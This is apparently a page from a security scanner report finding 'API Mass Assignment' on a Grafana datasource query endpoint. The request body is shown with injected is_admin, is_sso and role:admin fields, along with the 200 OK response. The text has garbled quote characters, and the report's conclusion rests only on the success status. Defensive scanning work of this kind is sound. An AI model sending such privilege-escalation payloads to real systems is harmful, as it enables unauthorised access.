Risk(s): API Mass Assignment exploitation may leads to privilege escalation, data tampering, bypass of security mechanisms
Fix: Avoid using functions that automatically bind clientâs input to code variables or internal objects.If applicable, explicitly define
and enforce schemaâs for the input data payloads.
Variant 1 of 1
The following changes were applied to the original request:
Set body to
'{âqueriesâ:[{âdatasourceâ:{âtypeâ:âprometheusâ,âuidâ:âabcdefghijkâ},âexprâ:"count(up{job="www_hea
rtbeat"})â,âinstantâ:true,âintervalâ:â",âlegendFormatâ:âTOTALâ,ârefIdâ:âGâ,âexemplarâ:false,"requ
estId":â12Gâ,âutcOffsetSecâ:-14400,âdatasourceIdâ:1,âintervalMsâ:15000,âmaxDataPointsâ:391},{"data
source":{âtypeâ:âprometheusâ,âuidâ:âabcdefghijkâ},âexprâ:"sum(probe_success{job="www_heartbeat"})
â,âinstantâ:true,âintervalâ:â",âlegendFormatâ:âupâ,ârefIdâ:âBâ,âexemplarâ:false,ârequestIdâ:â12Bâ,
âutcOffsetSecâ:-14400,âdatasourceIdâ:1,âintervalMsâ:15000,âmaxDataPointsâ:391},{âdatasourceâ:{"typ
e":âprometheusâ,âuidâ:âabcdefghijkâ},âexprâ:"count(up{job="www_heartbeat"})-sum(probe_success{job
="www_heartbeat"})â,âinstantâ:true,âintervalâ:â",âlegendFormatâ:âDOWNâ,ârefIdâ:âAâ,âexemplarâ:f
alse,ârequestIdâ:â12Aâ,âutcOffsetSecâ:-14400,âdatasourceIdâ:1,âintervalMsâ:15000,âmaxDataPointsâ:3
91}],ârangeâ:{âfromâ:â2023-04-06T15:53:18.673Zâ,âtoâ:â2023-04-06T15:58:18.673Zâ,ârawâ:{âfromâ:"now
-5m",âtoâ:ânowâ}},âfromâ:â1680796398673â,âtoââŠâ
Reasoning:
The test result seems to indicate a vulnerability because the Test Response is successful (returns
200 OK), indicating that the Application/API access is successful.
Request/Response:
POST /grafana/api/ds/query HTTP/1.1
Host: example.org
Connection: keep-alive
x-plugin-id: prometheus
x-grafana-org-id: 1
x-panel-id: 12
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
content-type: application/json
accept: application/json, text/plain, /
x-dashboard-uid: xyz
x-datasource-uid: abcdefghijk
Accept-Language: en-US
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://example.org/grafana/d/xyz/team-home-dashboard?orgId=1
{âqueriesâ:[{âdatasourceâ:{âtypeâ:âprometheusâ,âuidâ:âabcdefghijkâ},âexprâ:"count(up{job="www_hear
tbeat"})â,âinstantâ:true,âintervalâ:â",âlegendFormatâ:âTOTALâ,ârefIdâ:âGâ,âexemplarâ:false,"reque
stId":â12Gâ,âutcOffsetSecâ:-14400,âdatasourceIdâ:1,âintervalMsâ:15000,âmaxDataPointsâ:391},{"datas
ource":{âtypeâ:âprometheusâ,âuidâ:âabcdefghijkâ},âexprâ:âsum(probe_success{job="www_heartbeat"})â
,âinstantâ:true,âintervalâ:ââ,âlegendFormatâ:âupâ,ârefIdâ:âBâ,âexemplarâ:false,ârequestIdâ:â12Bâ,"
utcOffsetSec":-14400,âdatasourceIdâ:1,âintervalMsâ:15000,âmaxDataPointsâ:391},{âdatasourceâ:{"type
":âprometheusâ,âuidâ:âabcdefghijkâ},âexprâ:"count(up{job="www_heartbeat"})-sum(probe_success{job=
"www_heartbeat"})â,âinstantâ:true,âintervalâ:â",âlegendFormatâ:âDOWNâ,ârefIdâ:âAâ,âexemplarâ:fa
lse,ârequestIdâ:â12Aâ,âutcOffsetSecâ:-14400,âdatasourceIdâ:1,âintervalMsâ:15000,âmaxDataPointsâ:39
1}],ârangeâ:{âfromâ:â2023-04-06T15:53:18.673Zâ,âtoâ:â2023-04-06T15:58:18.673Zâ,ârawâ:{âfromâ:"now-
5m",âtoâ:ânowâ}},âfromâ:â1680796398673â,âtoâ:â1680796698673â,âis_adminâ:true,âis_ssoâ:true,âroleâ:
âadminâ}
HTTP/1.1 200 OK
Date: Thu, 06 Apr 2023 16:07:03 GMT
Server: Apache
Strict-Transport-Security: max-age=63072000
Cache-Control: no-store
Content-Security-Policy: script-src âselfâ âunsafe-evalâ âunsafe-inlineâ âstrict-dynamicâ 'nonce-
BJxd2DTka/W5jHH/Ynx9lwâ;object-src ânoneâ;font-src âselfâ;style-src âselfâ âunsafe-inlineâ
© Copyright HCL Technologies Limited 2000, 2023. All Rights Reserved. - 8 -
blob:;img-src * data:;base-uri âselfâ;connect-src âselfâ example.org
ws://example.org/grafana/ wss://example.org/grafana/;manifestsrc
âselfâ;media-src ânoneâ;form-action âselfâ;
Content-Type: application/json
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Xss-Protection: 1; mode=block
Content-Length: 1472
Keep-Alive: timeout=15, max=43